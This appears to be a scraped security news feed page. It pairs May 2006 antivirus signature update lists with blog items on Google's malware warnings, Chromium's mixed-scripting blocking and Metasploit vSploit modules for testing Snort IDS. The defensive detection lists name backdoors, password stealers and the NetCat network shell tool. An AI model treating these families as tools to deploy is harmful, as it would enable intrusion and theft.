  Application extension (1)
    Adware-Beginto.dll
  Dialer (2)
    Dialer-Generic.e
    Dialer-292
  Dropper (1)
    Adware-Beginto.dr
  Malware Tool (1)
    Spam-TopMail
  Tool (1)
    Tool-NetCat
  Win32 (3)
    RemAdm-RemoteAdmin
    Generic Dialer.ba
    Uploader-AB
Trojan (79)
   (5)
    Generic BackDoor.d
    Generic Dropper.b
    Generic BackDoor.bb
    Generic Proxy.h
    Generic.f
  Application extension (3)
    PWS-Legmir.dll
    BackDoor-AWQ.dll
    BackDoor-BAC.dll
  Client (1)
    Orifice2K.cli
  Configuration settings (1)
    HackerDefender.ini
  Configurator (1)
    Orifice2K.cfg
  Downloader (4)
    Downloader-AAP
    Downloader-AUE
    Downloader-ASN
    Downloader-ASH
  Dropper (4)
    Generic BackDoor.dr
    BackDoor-AWQ.dr
    BackDoor-CKB.dr
    PWS-Banker.dr.a
  Exploit (3)
    JS/Exploit-ObjectCDS
    JS/Exploit-HelpXSite
    Exploit-DFind
  Generic (9)
    Exploit-CodeBase.gen
    Generic Downloader.gen.bd
    Exploit-OleData.gen
    PWS-Banker.gen.bb
    PWS-Banker.gen.b
    PWS-Banker.gen.l
    PWS-Banker.gen.j
    PWS-Banker.gen.g
    BackDoor-BAC.gen.b
  Heuristic (1)
    New Malware.u
  Malware Tool (1)
    Spam-Gadina
  Password (2)
    PWS-LegMir
    PWS-QQPass
  Password Stealer (8)
    PWS-JA
    PWS-Lineage!chm
    PWS-Banker.gen.i
    PWS-Banker.gen.h
    PWS-Banker.ba
    PWS-Banker.bh
    PWS-WoW
    PWS-Lineage
  Remote Access (11)
    BackDoor-AWQ.b
    BackDoor-BAC
    BackDoor-AWQ
    BackDoor-CZV
    BackDoor-CQC
    BackDoor-CRK
    BackDoor-BAC.gen.d
    BackDoor-BAC.sys
    BackDoor-CMQ
    BackDoor-CZI
    BackDoor-CKB
  Script (2)
    VBS/Piky
    Generic component
  Server (1)
    Orifice2K.svr
  Tool (1)
    Tool-HideWindow
  Win32 (21)
    Generic VB
    Generic Downloader.c
    Orifice2K
    Generic Downloader.n
    Generic MSVC
    Generic Downloader.d
    Puper
    Generic Downloader.s
    Generic BackDoor.be
    Generic BackDoor.ba
    Swizzor
    Generic Downloader.q
    Generic PWS.o
    Generic QLowZones.a
    Generic BackDoor.u
    Generic Downloader.ab
    Generic VB.c
    Exponny
    Generic BackDoor.w
    Generic Downloader.g
    Generic Downloader.h
Virus (28)
  Application extension Worm (1)
    W32/IRCbot.worm.dll
  Damaged Worm (2)
    W32/Protoride.worm.dam
    W32/Sdbot.worm.dam
  E-mail (3)
    Exploit-MIME.gen
    W32/Areses.k@MM
    W32/Areses.j@MM
  Email (2)
    W32/Areses.i@MM
    W32/Areses.h@MM
  Generic (1)
    Exploit-MIME.gen.exe
  Generic Worm (9)
    W32/Sdbot.worm.gen.bg
    W32/Sdbot.worm.gen.h
    W32/Spybot.worm.gen.by
    W32/Sdbot.worm.gen.ae
    W32/Sdbot.worm.gen.bq
    W32/Gaobot.worm.gen.t
    W32/Sdbot.worm.gen.bd
    W32/Sdbot.worm.gen.by
    W32/Sdbot.worm.gen.q
  Heuristic (1)
    New Script.ext
  JavaScript (1)
    JS/Xilos
  mIRC Worm (1)
    W32/Protoride.worm
  Script (1)
    Univ.script/99a
  VbScript (2)
    VBS/Loveletter@MM
    New Script
  Win32 (2)
    W32/Jadi
    W32/Loosky
  Win9x (2)
    W95/CTX.10853
    W95/CTX.6886
Channel Image14:56 Virus Updates for May 16th, 2006» Virus Tracker
DAT Version:4763
DAT Release Date:5-16-2006
Threats Detected:190579
New Detections:15
Enhanced Detections:122



Enhanced detections are those that have been modified for this release. Detections are enhanced to cover new variants, optimize performance, and correct incorrect identifications.

Full list

New DetectionsEnhanced detections
Program (1)
Malware Tool (1)
Spam-TopMail
Trojan (12)
(1)
SymbOS/Multidropper.bn!sis
Application extension (1)
BackDoor-CIT.dll
Downloader (2)
Downloader-AWG
Downloader-AWF
Dropper (1)
MultiDropper-QP
Flooder (1)
FDoS-Yahoo.DeathBom
Generic (1)
Exploit-OleData.gen
Remote Access (2)
BackDoor-CZV
BackDoor-CZU
Script (1)
PHP/Defash
Win32 (1)
Spy-Agent.aw
Worm (1)
W32/Remhk.worm
Virus (2)
E-mail (1)
W32/Areses.k@MM
Email Generic (1)
JS/Feebs.gen.j@MM
- (1)
- (1)
Exploit-Shockwave
Program (8)
(3)
Generic Adware.inf.a
Generic Adware.txt
UnRealIRC
Adware (2)
Adware-DFC
Adware-IEDriver
Dialer (1)
Dialer-Generic.e
Downloader (1)
Adware-NS.dldr
Tool (1)
HTool-kker
Trojan (86)
(10)
Generic BackDoor.d
SymbOS/Multidropper.bf!sis
SymbOS/Multidropper.bj!sis
SymbOS/Multidropper.bh!sis
Generic BackDoor.bb
SymbOS/Multidropper.bl!sis
SymbOS/Multidropper.bk!sis
SymbOS/Multidropper.bi!sis
SymbOS/Multidropper.bg!sis
EditStartPage
- (2)
NTRootKit-J
Spam-Mailbot
AOL Password (1)
PWS-AOLFake
Application extension (3)
BackDoor-AWQ.dll
BackDoor-CGX.dll
Puper.dll
Configuration settings (1)
HackerDefender.ini
Damaged (1)
BackDoor-AWQ.b.dam
Downloader (13)
Downloader-DN
Downloader-FR
Downloader-AAD
Downloader-AEU
PWS-Banker.dldr
Downloader-AQV
Downloader-ABU
Downloader-AVM
Downloader-ZQ
Downloader-ASH
Downloader-ACR
Downloader-AQW
Downloader-QY
Dropper (3)
VBS/Inor
BackDoor-AWQ.dr
Kurofoo.dr
Exploit (1)
Exploit-IIS.Start
Flooder (7)
FDoS-Yahoo.Sponge
FDoS-Yahoo.RifRaf
FDoS-Yahoo.Double
FDoS-Yahoo.Killzone
FDoS-Yahoo.Jetlag
FDoS-Yahoo.Gucci
FDoS-Yahoo.Mystery
Generic (6)
Exploit-MhtRedir.gen
Generic Downloader.gen.bd
Generic Downloader.gen.be
PWS-Banker.gen.bb
PWS-Banker.gen.t
Exploit-MS06-006.gen
Generic Worm (1)
W32/Sdbot.worm.gen.ax
Heuristic (1)
New Malware.ab
Password (1)
PWS-WMPatch
Password Stealer (5)
PWS-Banker.gen.ba
PWS-Banker.gen.i
PWS-Banker.bh
PWS-WoW
PWS-Lineage
Proxy (3)
Proxy-FBSR
Proxy-Agent.c
Proxy-Horst
Remote Access (3)
BackDoor-AWQ.b
BackDoor-AWQ
BackDoor-CIT
Script (1)
Bat/arh
Win32 (23)
Generic BackDoor.b
Generic Delphi
Generic Downloader.c
QLowZones-32
Generic Downloader.p
Puper
Generic Downloader.s
Generic BackDoor.be
Generic BackDoor.bc
Generic BackDoor.ba
Kurofoo
Eeb
Generic Dropper.ad
Generic Dropper.p
Swizzor
Generic PWS.o
Generic Dropper.i
Generic BackDoor.u
Generic Downloader.ab
Generic VB.c
Generic AdClicker.p
Spy-Agent.ak
Generic AdClicker.d
Virus (27)
Email Generic (1)
W32/Feebs.gen@MM
Generic (1)
W32/IRCbot.gen.b
Generic Worm (20)
W32/Sdbot.worm.gen.as
W32/Sdbot.worm.gen.bg
W32/Gaobot.worm.gen.bj
W32/Opanki.worm.gen
W32/Spybot.worm.gen.bj
W32/Sdbot.worm.gen.l
W32/Sdbot.worm.gen.h
W32/Sdbot.worm.gen.m
W32/Sdbot.worm.gen.bk
W32/Sdbot.worm.gen.ae
W32/Sdbot.worm.gen.bs
W32/Sdbot.worm.gen.ag
W32/Gaobot.worm.gen.bw
W32/Sdbot.worm.gen.bh
W32/Sdbot.worm.gen.bi
W32/Sdbot.worm.gen.by
W32/Sdbot.worm.gen.bj
W32/Gaobot.worm.gen.bi
W32/Gaobot.worm.gen.by
W32/Sdbot.worm.gen.y
Peer To Peer (1)
W32/Generic.d!p2p
VbScript (1)
VBS/Loveletter@MM
Win32 (2)
Generic BackDoor.bf
W32/Feebs!rootkit
Worm (1)
W32/Dedler.worm
Channel Image14:56 Virus Updates for May 15th, 2006» Virus Tracker
DAT Version:4762
DAT Release Date:5-15-2006
Threats Detected:190,171
New Detections:11
Enhanced Detections:182



Enhanced detections are those that have been modified for this release. Detections are enhanced to cover new variants, optimize performance, and correct incorrect identifications.

Noteworthy threats are those that had an AVERT risk assessment of Low-Profiled, Medium, Medium-On-Watch, High, or High-Outbreak at the time of DAT release.

Noteworthy Threats:

NameCorporate Risk AssessmentHome Risk Assessment
W32/Hoots.worm

Low-Profiled

Low-Profiled

Full list

New DetectionsEnhanced detections
Program (1)
Malware Tool (1)
PWCrack-Crax
Trojan (7)
(1)
AdClicker-EI
Application extension (1)
Downloader-AUE.dll
Dropper (1)
Kurofoo.dr
Generic (1)
PWS-Banker.gen.ab
Remote Access (1)
BackDoor-CZT
Win32 (2)
Kurofoo
ProcKill
Virus (3)
Email (1)
W32/Lovgate.au@MM
Win32 (1)
W32/Niklas
Worm (1)
W32/Hoots.worm
Program (5)
Adware (3)
Adware-Adwin
Adware-NaviPromo
Adware-ClickSpring
Win32 (2)
Generic Adware.aa
Generic HTool.bb
Trojan (95)
(4)
Generic Dropper.o
Generic.cf
Generic BackDoor.bb
Generic.cd
Application extension (2)
PWS-Legmir.dll
MailSkinner.dll
Configurator (2)
ProcKill-Q.cfg
Generic PWS.c.cfg
Downloader (6)
BackDoor-CYY.dldr
Downloader-AAP
Downloader-ABU
Downloader-AUE
Downloader-ASH
Downloader-ARM
Dropper (3)
PWS-LDPinch.dr
Generic PWS.c.dr
PWS-Goldun.dr
Exploit (1)
Exploit-SWF.b!demo
Generic (7)
Generic Downloader.gen.bd
Generic Downloader.gen.be
Swizzor.gen
PWS-Banker.gen.bb
PWS-Banker.gen.g
RemAdm-RemoteAdmin.gen.ba
PWS-Banker.gen.v
Generic Worm (1)
W32/Sdbot.worm.gen.ax
Password (1)
PWS-LDPinch
Password Stealer (10)
Generic PWS.c
PWS-QQRob
PWS-JA
Generic PWS.u
PWS-Banker.gen.ba
PWS-Banker.gen.i
PWS-Banker.gen.h
PWS-Banker.au
PWS-Lineage
PWS-Yulz
PDA Device (1)
SymbOS/Skulls.a
Process (2)
ProcKill-AE
ProcKill-AF
ProcKill (23)
ProcKill-BW
ProcKill-H
ProcKill-F
ProcKill-BT
ProcKill-BO
ProcKill-BJ
ProcKill-AU
ProcKill-AL
ProcKill-AC
ProcKill-AA
ProcKill-S
ProcKill-Q
ProcKill-P
ProcKill-M
ProcKill-L
ProcKill-K
ProcKill-J
ProcKill-F.cln
ProcKill-D
ProcKill-C
ProcKill-DQ
ProcKill-CG
ProcKill-BX
Proxy (2)
Proxy-Agent.au
Proxy-Piky
Remote Access (6)
BackDoor-AWQ.b
BackDoor-CGX
BackDoor-CMQ
BackDoor-CYY
Generic BackDoor.m
Generic BackDoor.k
Spam (1)
Spam-Loot
Spyware (1)
MailSkinner
Trojan (1)
Multidropper
Win32 (21)
Generic Downloader.a
Generic BackDoor.b
Generic BackDoor.f
Generic BackDoor.bg
Generic VB.b
Generic Downloader.d
FakeAlert-C
Generic Downloader.s
QLowZones-15
Generic BackDoor.be
Generic BackDoor.bc
Generic BackDoor.ba
Generic AdClicker.j
Generic AdClicker.b
Generic PWS.o
Generic QLowZones.a
Generic BackDoor.u
Generic Downloader.ab
DDoS-Boxed
AdClicker-BJ
Generic AdClicker.d
Virus (82)
(12)
SymbOS/Skulls.ci
SymbOS/Skulls.f
SymbOS/Skulls.e
SymbOS/Skulls.g
SymbOS/Skulls.h
SymbOS/Skulls.i
SymbOS/Skulls.cf
SymbOS/Skulls.cg
SymbOS/Skulls.c
SymbOS/Skulls!aif
SymbOS/Skulls.d
SymbOS/Skulls.ca
Application extension (1)
W32/Kernl.dll
Damaged (3)
W32/Lovgate.dam
W32/Netsky.dam!zip
W32/Lovgate.x.dam
E-mail (1)
W32/Lovgate.ah@MM
E-mail worm (7)
W32/Lovgate.f@M
W32/Lovgate.g@M
W32/Lovgate.ac@MM
W32/Lovgate.ad@MM
W32/Lovgate.af@MM
W32/Lovgate.aj@MM
W32/Lovgate.ab@MM
Email (28)
W32/Lovgate.r@MM
W32/Lovgate.b@M
W32/Lovgate.ar@MM
W32/Lovgate.m@M
W32/Netsky.q@MM!zip
W32/Netsky.n@MM!zip
W32/Netsky.b@MM!zip
W32/Netsky.p@MM!zip
W32/Netsky.c@MM!zip
W32/Netsky.a@MM!zip
W32/Netsky.z@MM!zip
W32/Lovgate.q@MM
W32/Lovgate.p@MM
W32/Lovgate.v@M
W32/Lovgate.t@MM
W32/Lovgate.u@MM
W32/Lovgate.w@M
W32/Lovgate.al@MM
W32/Lovgate.at@MM
W32/Lovgate.aa@MM
W32/Lovgate.ao@MM
W32/Lovgate.an@MM
W32/Lovgate.as@MM
W32/Netsky.ai@MM!zip
W32/Lovgate.aq@MM
W32/Netsky.ag@MM!zip
W32/Lovgate.ak@MM
W32/Lovgate.ae@MM
Email Generic (1)
JS/Feebs.gen.h@MM
Email Worm (2)
W32/Lovgate.ai@MM
W32/Lovgate.ag@MM
Generic (1)
SymbOS/Skulls.gen
Generic Worm (11)
W32/Sdbot.worm.gen.bg
W32/Sdbot.worm.gen.n
W32/Sdbot.worm.gen.h
W32/Sdbot.worm.gen.m
W32/Sdbot.worm.gen.bs
W32/Sdbot.worm.gen.bh
W32/Sdbot.worm.gen.bi
W32/Sdbot.worm.gen.by
W32/Sdbot.worm.gen.bj
W32/Gaobot.worm.gen.bi
W32/Gaobot.worm.gen.by
Internet Relay Chat Worm (1)
W32/Akbot
Peer To Peer (1)
W32/Generic.d!p2p
Win32 (6)
New Win32.s
New Win32
W32/Lovgate
Generic BackDoor.bf
W32/Loosky
W32/Generic.x
Worm (7)
W32/Lovgate.n@M
W32/Lovgate.l@M
W32/Lovgate.a@M
W32/Lovgate.c@M
W32/Lovgate.s@MM
W32/Lovgate.x@MM
W32/Dedler.worm
Channel Image14:56 Virus Updates for May 11th, 2006» Virus Tracker
DAT Version:4760
DAT Release Date:5-11-2006
Threats Detected:189,590
New Detections:6/td>
Enhanced Detections:72



Enhanced detections are those that have been modified for this release. Detections are enhanced to cover new variants, optimize performance, and correct incorrect identifications.

Full list

New DetectionsEnhanced detections
Trojan (5)
  Downloader (2)
    BackDoor-CYY.dldr
    Downloader-AWE
  Dropper (1)
    QHosts-55.dr
  Remote Access (1)
    BackDoor-CKB!rootkit
  Win32 (1)
    W32/Kittykat!bat
Virus (1)
  Win32 (1)
    W32/Kittykat
Program (5)
  Adware (2)
    Adware-Boran
    Adware-CasClient
  Dialer (1)
    Dialer-Generic.f
  ProcKill (1)
    ProcKill-DO
  Win32 (1)
    Generic HTool.a
Trojan (56)
   (1)
    Generic BackDoor.bb
  Application extension (5)
    Puper.dll
    BackDoor-CKB.dll
    PWS-Goldun.dll
    PWS-Lineage.dll
    PWS-LDPinch.dll!ldr
  Application extension Generi (1)
    BackDoor-CKB.dll.gen
  Downloader (7)
    Downloader-DC
    Downloader-AEU
    Downloader-AVS
    Downloader-ZQ
    Downloader-AUX
    Downloader-ASH
    Downloader-AQW
  Dropper (3)
    MultiDropper-IY
    MultiDropper-JI
    BackDoor-CKB.dr
  Exploit (1)
    Exploit-SWF.b!demo
  Generic (8)
    Oleloa.gen
    Downloader-AAP.gen
    Swizzor.gen
    PWS-Banker.gen.bb
    HackerDefender.gen.c
    PWS-Banker.gen.t
    Exploit-MS06-006.gen
    PWS-Banker.gen.v
  Generic Worm (1)
    W32/Sdbot.worm.gen.ax
  Password (2)
    PWS-LegMir
    PWS-LDPinch
  Password Stealer (3)
    Generic PWS.g
    PWS-Banker.gen.ba
    PWS-Banker.gen.i
  Plugin component (1)
    BackDoor-JX.plugin
  Proxy (1)
    Proxy-Raser
  Remote Access (6)
    BackDoor-AWQ.b
    BackDoor-CKB.sys
    BackDoor-CZP
    BackDoor-CYY
    BackDoor-CKB
    BackDoor-CEP
  Script (1)
    Generic component
  Win32 (15)
    Generic Downloader.a
    HackerDefender
    HackerDefender.sys
    Generic VB.b
    Puper
    Generic BackDoor.ba
    Generic Proxy.c
    Generic Downloader.k
    Swizzor
    Generic PWS.o
    Generic BackDoor.u
    Generic Downloader.ab
    Generic VB.c
    Generic Downloader.bg
    Generic Downloader.g
Virus (11)
  Damaged Worm (2)
    W32/Gaobot.worm.dam
    W32/Sdbot.worm.dam
  Generic Worm (6)
    W32/Gaobot.worm.gen.k
    W32/Gaobot.worm.gen.e
    W32/Sdbot.worm.gen.ca
    W32/Sdbot.worm.gen.ae
    W32/Sdbot.worm.gen.bd
    W32/Sdbot.worm.gen.t
  Linux (1)
    Linux/Adrastea
  Win32 (1)
    W32/Generic.e
  Worm (1)
    W32/Opanki.worm
Channel Image14:56 Virus Updates for 5-10-2006» Virus Tracker
DAT Version:4759
DAT Release Date:5-10-2006
Threats Detected:189,440
New Detections:6
Enhanced Detections:164



Enhanced detections are those that have been modified for this release. Detections are enhanced to cover new variants, optimize performance, and correct incorrect identifications.

Full list

New DetectionsEnhanced detections
Program (1)
  Keylogger (1)
    Keylog-WebSniffer
Trojan (1)
  Generic (1)
    SymbOS/Doomboot.gen!sis
Virus (4)
  E-mail (1)
    W32/Areses.j@MM
  Generic (2)
    SymbOS/Skulls.gen!sis
    SymbOS/Fontal.gen!sis
  Peer To Peer Worm (1)
    W32/Vizim.worm!p2p
Internet Worm (1)
  E-mail (1)
    W32/Areses.a@MM
Program (8)
  Adware (2)
    Adware-2Search
    Adware-NaviPromo
  Application extension (1)
    KeyHook.dll
  Keylogger (2)
    Keylog-Ardamax
    Keylog-Ardamax.dr
  Tool (1)
    Tool-Tpatch
  Win32 (2)
    RemAdm-RemoteAdmin
    Winfixer
Trojan (49)
   (2)
    Generic BackDoor.bb
    Phish-BankFraud.eml.a
  - (1)
    Spam-Mailbot
  Application extension (3)
    BackDoor-BAC.dll
    PWS-Goldun.dll
    BackDoor-CXP.dll
  Configuration settings (1)
    HackerDefender.ini
  Downloader (7)
    Downloader-ABU
    Downloader-AVS
    PWS-Banker.dldr.b
    Downloader-ASH
    Downloader-AQW
    Downloader-ARR
    Downloader-GG!chm
  Dropper (4)
    IRC/Flood.gen.dr
    BackDoor-CKB.dr
    PWS-Banker.dr.i
    BackDoor-BAC.dr
  Dropper Generic (1)
    AdClicker-C.gen.dr
  Exploit (2)
    Exploit-SWF.b!demo
    Exploit-SWF!demo
  Generic (4)
    Generic Downloader.gen.be
    BackDoor-BAC.gen
    PWS-Banker.gen.bb
    PWS-Banker.gen.g
  Generic Worm (1)
    W32/Sdbot.worm.gen.ax
  Heuristic (1)
    New Malware.ab
  Internet Relay Chat (1)
    IRC/Flood.c
  Password (1)
    PWS-LDPinch
  Password Stealer (1)
    PWS-Banker.gen.i
  ProcKill (1)
    ProcKill-AK
  Remote Access (6)
    BackDoor-AWQ.b
    BackDoor-BAC
    BackDoor-CXP
    BackDoor-CVT
    BackDoor-BAC.sys
    Generic BackDoor.k
  Win32 (12)
    Generic Downloader.c
    DollarRevenue
    Generic Downloader.ak
    Generic VB.b
    Generic BackDoor.ba
    Generic Downloader.x
    Generic PWS.o
    Generic Downloader.ab
    Kakkeys
    Generic VB.c
    Generic Downloader.g
    Generic MultiDropper.b
Virus (106)
  Application extension Worm (1)
    W32/Maddis.worm.dll
  Damaged (1)
    W32/Mytob.dam
  Damaged Worm (1)
    W32/Gaobot.worm.dam
  Downloader Worm (1)
    W32/Bropia.worm.dldr
  E-mail (1)
    W32/Mytob.gr@MM
  Email (73)
    W32/Mytob.ao@MM
    W32/Mytob.al@MM
    W32/Mytob.ew@MM
    W32/Mytob.fa@MM
    W32/Mytob.ft@MM
    W32/Mytob.fs@MM
    W32/Mytob.aw@MM
    W32/Mytob.fr@MM
    W32/Mytob.ba@MM
    W32/Mytob.bc@MM
    W32/Mytob.bb@MM
    W32/Mytob.bd@MM
    W32/Mytob.id@MM
    W32/Mytob.fu@MM
    W32/Mytob.fw@MM
    W32/Mytob.fv@MM
    W32/Mytob.ge@MM
    W32/Mytob.go@MM
    W32/Areses.i@MM
    W32/Mytob.bu@MM
    W32/Mytob.bq@MM
    W32/Mytob.by@MM
    W32/Mytob.cq@MM
    W32/Mytob.ck@MM
    W32/Mytob.fz@MM
    W32/Mytob.gf@MM
    W32/Mytob.gn@MM
    W32/Mytob.gp@MM
    W32/Areses.h@MM
    W32/Mytob.cw@MM
    W32/Mytob.p@MM
    W32/Mytob.i@MM
    W32/Mytob.k@MM
    W32/Mytob.r@MM
    W32/Mytob.gm@MM
    W32/Mytob.gs@MM
    W32/Mytob.m@MM
    W32/Mytob.bs@MM
    W32/Mytob.de@MM
    W32/Mytob.cb@MM
    W32/Mytob.do@MM
    W32/Mytob.dl@MM
    W32/Mytob.h@MM
    W32/Mytob.j@MM
    W32/Mytob.l@MM
    W32/Mytob.o@MM
    W32/Mytob.t@MM
    W32/Mytob.x@MM
    W32/Mytob.y@MM
    W32/Mytob.cr@MM
    W32/Mytob.cl@MM
    W32/Mytob.ci@MM
    W32/Mytob.cx@MM
    W32/Mytob.cy@MM
    W32/Mytob.dn@MM
    W32/Mytob.ei@MM
    W32/Mytob.aa@MM
    W32/Mytob.ad@MM
    W32/Mytob.dw@MM
    W32/Mytob.dv@MM
    W32/Mytob.du@MM
    W32/Mytob.aj@MM
    W32/Mytob.z@MM
    W32/Mytob.hq@MM
    W32/Mytob.eg@MM
    W32/Mytob.ho@MM
    W32/Mytob.hn@MM
    W32/Mytob.hk@MM
    W32/Mytob.hm@MM
    W32/Mytob.hj@MM
    W32/Mytob.ha@MM
    W32/Mytob.em@MM
    W32/Mytob.en@MM
  Email Generic (1)
    W32/Mytob.gen@MM
  Generic Worm (6)
    W32/Gaobot.worm.gen.e
    W32/IRCbot.worm.gen
    W32/Sdbot.worm.gen.h
    W32/Sdbot.worm.gen.ae
    W32/Spybot.worm.gen.j
    W32/Sdbot.worm.gen.t
  Internet Worm (4)
    W32/Maddis.worm
    W32/Bropia.worm.gen
    W32/Bropia.worm.d
    W32/P2Load.gen!p2p
  Win32 (3)
    W32/Generic.e
    W32/Massflag!enc
    W32/Generic.Delphi.a
  Worm (14)
    W32/Bropia.worm.e
    W32/Nugache@MM
    W32/Bropia.worm.ap
    W32/Bropia.worm.m
    W32/Bropia.worm.ac
    W32/Bropia.worm.bn
    W32/Bropia.worm.ag
    W32/Bropia.worm.af
    W32/Opanki.worm
    W32/Bropia.worm.bo
    W32/Bropia.worm.b
    W32/Bropia.worm.a
    W32/Bropia.worm.c
    W32/Bropia.worm.bt
Channel Image14:56 Using data to protect people from malware» Google Online Security Blog


(Cross-posted from the Official Google Blog)

The Internet brings remarkable benefits to society. Unfortunately, some people use it for harm and their own gain at the expense of others. We believe in the power of the web and information, and we work every day to detect potential abuse of our services and ward off attacks.

As we work to protect our users and their information, we sometimes discover unusual patterns of activity. Recently, we found some unusual search traffic while performing routine maintenance on one of our data centers. After collaborating with security engineers at several companies that were sending this modified traffic, we determined that the computers exhibiting this behavior were infected with a particular strain of malicious software, or “malware.” As a result of this discovery, today some people will see a prominent notification at the top of their Google web search results:


This particular malware causes infected computers to send traffic to Google through a small number of intermediary servers called “proxies.” We hope that by taking steps to notify users whose traffic is coming through these proxies, we can help them update their antivirus software and remove the infections.

We hope to use the knowledge we’ve gathered to assist as many people as possible. In case our notice doesn’t reach everyone directly, you can run a system scan on your computer yourself by following the steps in our Help Center article.

Updated July 20, 2011: We've seen a few common questions we thought we'd address here:
  • The malware appears to have gotten onto users' computers from one of roughly a hundred variants of fake antivirus, or "fake AV" software that has been in circulation for a while. We aren't aware of a common name for the malware.
  • We believe a couple million machines are affected by this malware.
  • We've heard from a number of you that you're thinking about the potential for an attacker to copy our notice and attempt to point users to a dangerous site instead. It's a good security practice to be cautious about the links you click, so the spirit of those comments is spot-on. We thought about this, too, which is why the notice appears only at the top of our search results page. Falsifying the message on this page would require prior compromise of that computer, so the notice is not a risk to additional users.
  • In the meantime, we've been able to successfully warn hundreds of thousands of users that their computer is infected. These are people who otherwise may never have known.
Channel Image14:56 US ISPs commit to new cybersecurity measures» Network World NetFlash
A group of U.S. Internet service providers, including the four largest, have committed to taking new steps to combat three major cybersecurity threats, based on recommendations from a U.S. Federal Communications Commission advisory committee.
Channel Image14:56 U.S. Cellular throws its 4G LTE hat in the ring» Network World NetFlash
U.S. Cellular joined the ranks of U.S. carriers with commercial LTE service on Thursday, launching the Samsung Galaxy Tab 10.1 as its first LTE-capable device.
Channel Image14:56 Trying to end mixed scripting vulnerabilities» Google Online Security Blog


A “mixed scripting” vulnerability is caused when a page served over HTTPS loads a script, CSS, or plug-in resource over HTTP. A man-in-the-middle attacker (such as someone on the same wireless network) can typically intercept the HTTP resource load and gain full access to the website loading the resource. It’s often as bad as if the web page hadn’t used HTTPS at all.

A less severe but similar problem -- let’s call it a “mixed display” vulnerability -- is caused when a page served over HTTPS loads an image, iFrame, or font over HTTP. A man-in-the-middle attacker can again intercept the HTTP resource load but normally can only affect the appearance of the page.

Browsers have long used different indicators, modal dialogs, block options or even click-throughs to indicate these conditions to users. If a page on your website has a mixed scripting issue, Chromium will currently indicate it like this in the URL bar:



And for a mixed display issue:



If any of the HTTPS pages on your website show the cross-out red https, there are good reasons to investigate promptly:
  • Your website won’t work as well in other modern browsers (such as IE9 or FF4) due to click-throughs and ugly modal dialogs.
  • You may have a security vulnerability that could compromise the entire HTTPS connection.
As of the first Chromium 14 canary release (14.0.785.0), we are trialing blocking mixed scripting conditions by default. We’ll be carefully listening to feedback; please leave it on this Chromium bug.

We also added an infobar that shows when a script is being blocked:


As a user, you can choose to reload the website without the block applied. Ideally, in the longer term, the infobar will not have the option for the user to bypass it. Our experience shows that some subset of users will attempt to “click through” even the scariest of warnings -- despite the hazards that can follow.

Tools that can help website owners
If Chromium’s UI shows any mixed content issues on your site, you can try to use a couple of our developer tools to locate the problem. A useful message is typically logged to the JavaScript console (Menu -> Tools -> JavaScript Console):


You can also reload the page with the “Network” tab active and look for requests that were issued over the http:// protocol. It’s worth noting that the entire origin is poisoned when mixed scripting occurs in it, so you’ll want to look at the console for all tabs that reference the indicated origin. To clear the error, all tabs that reference the poisoned origin need to be closed. For particularly tough cases where it’s not clear how the origin became poisoned, you can also enable debugging to the command-line console to see the relevant warning message.

The latest Chromium 13 dev channel build (13.0.782.10) has a command line flag: --no-running-insecure-content. We recommend that website owners and advanced users run with this flag, so we can all help mop up errant sites. (We also have the flag --no-displaying-insecure-content for the less serious class of mixed content issues; there are no plans to block this by default in Chromium 14).

The Chromium 14 release will come with an inverse flag: --allow-running-insecure-content, as a convenience for users and admins who have internal applications without immediate fixes for these errors.

Thanks for helping us push website security forward as a community. Until this class of bug is stamped out, Chromium has your back.
Channel Image14:56 Traduction en français du site web de chkrootkit.org achevée» frenchkrootkit
Channel Image14:56 The Web Needs to Get Ready for the High-Resolution Future» Wired Top Stories
The new iPad is just the first in a coming tidal wave of high-resolution screens. Today we have hacks, but what the web needs are new standards and new tools to make sure developers are ready for the high-resolution future.


Channel Image14:56 The Vendor Prefix Predicament: ALA’s Eric Meyer Interviews Tantek Çelik» A List Apart
During a public meeting of the W3C CSS Working Group, Mozilla web standards lead Tantek Çelik precipitated a crisis in Web Standards Land when he complained about developers who misunderstand and abuse vendor prefixes by only supporting WebKit’s, thereby creating a browser monoculture. Tantek’s proposed solution—having Mozilla pretend to be WebKit—inflamed many in the standards community, especially when representatives from Opera and Microsoft immediately agreed about the problem and announced similar plans to Mozilla’s. To get to the bottom of the new big brouhaha, exclusively for A List Apart, our Eric Meyer interviews Tantek on Mozilla’s controversial plan to support -webkit- prefixed properties.
Channel Image14:56 The Translucent Cloud: Balancing Privacy, Convenience» Wired Top Stories
When a cloud service is offered for free, supported by ads that use my personal info to profile me, this exposure is the price I pay for convenient access to my own data. Is this a reasonable trade-off? There is a better way, writes Jon Udell.


Channel Image14:56 The Best Browser is the One You Have with You» A List Apart
The web as we know and build it has primarily been accessed from the desktop. That is about to change. The ITU predicts that in the next 18–24 months, mobile devices will overtake PCs as the most popular way to access the web. If these predictions come true, very soon the web—and its users—will be mostly mobile. Even designers who embrace this change can find it confusing. One problem is that we still consider the mobile web a separate thing. Stephanie Rieger of futurefriend.ly and the W3C presents principles to understand and design for a new normal, in which users are channel agnostic, devices are plentiful, standards are fleeting, mobile use doesn’t necessarily mean “hide the desktop version,” and every byte counts.
Channel Image14:56 Testing Snort IDS with Metasploit vSploit Modules» Metasploit

One of my key objectives for developing the new vSploit modules was to test network devices such as Snort. Snort or Sourcefire enterprise products are widely deployed in enterprises, so Snort can safely be considered the de-facto standard when it comes to intrusion detection systems (IDS). So much that even third-party intrusion detection systems often import Snort rules.

 

Organizations are often having a tough time verifying that their IDS deployment actually work as intended, which is why I created several vSploit modules to test whether Snort sensors are seeing certain traffic. Since vSploit modules were made to trigger Snort alerts, they don't obfuscate attacks to avoid detection.

 

However, not every rule is used in every environment. For example, if you aren't using Microsoft Frontpage on your network, you likely won't want to use Snort's Frontpage rules. On the other hand, if you are running Frontpage you may not want to try exploiting it because it may affect the production system. Because of Metasploit Framework's flexibility, you can use the vSploit Generic HTTP Server module to host a small web server that answers all testing requests, so production systems won't be affected.

 

You can run vSploit modules with a mix of Metasploit Framework, Metasploit Pro, and Metasploit Express, providing there is end-to-end network connectivity to the vSploit instances:

 

2011-07-08_1602.png

 

 

 

To try out the new vSploit modules, start up the vSploit Generic HTTP Server.

 

2011-07-08_1531_001.png

Then launch Frontpage-related attack attributes:

 

2011-07-08_1531.png

 

Verify that the packets are being transmitted in Wireshark:

 

2011-07-08_1542.png

 

Finally, verify that Snort IDS sees the activity:

 

2011-07-08_1551.png

 

Metasploit vSploit Modules will be released at DEFCON 19.

Channel Image14:56 Test Your Stress Levels» Wired Top Stories
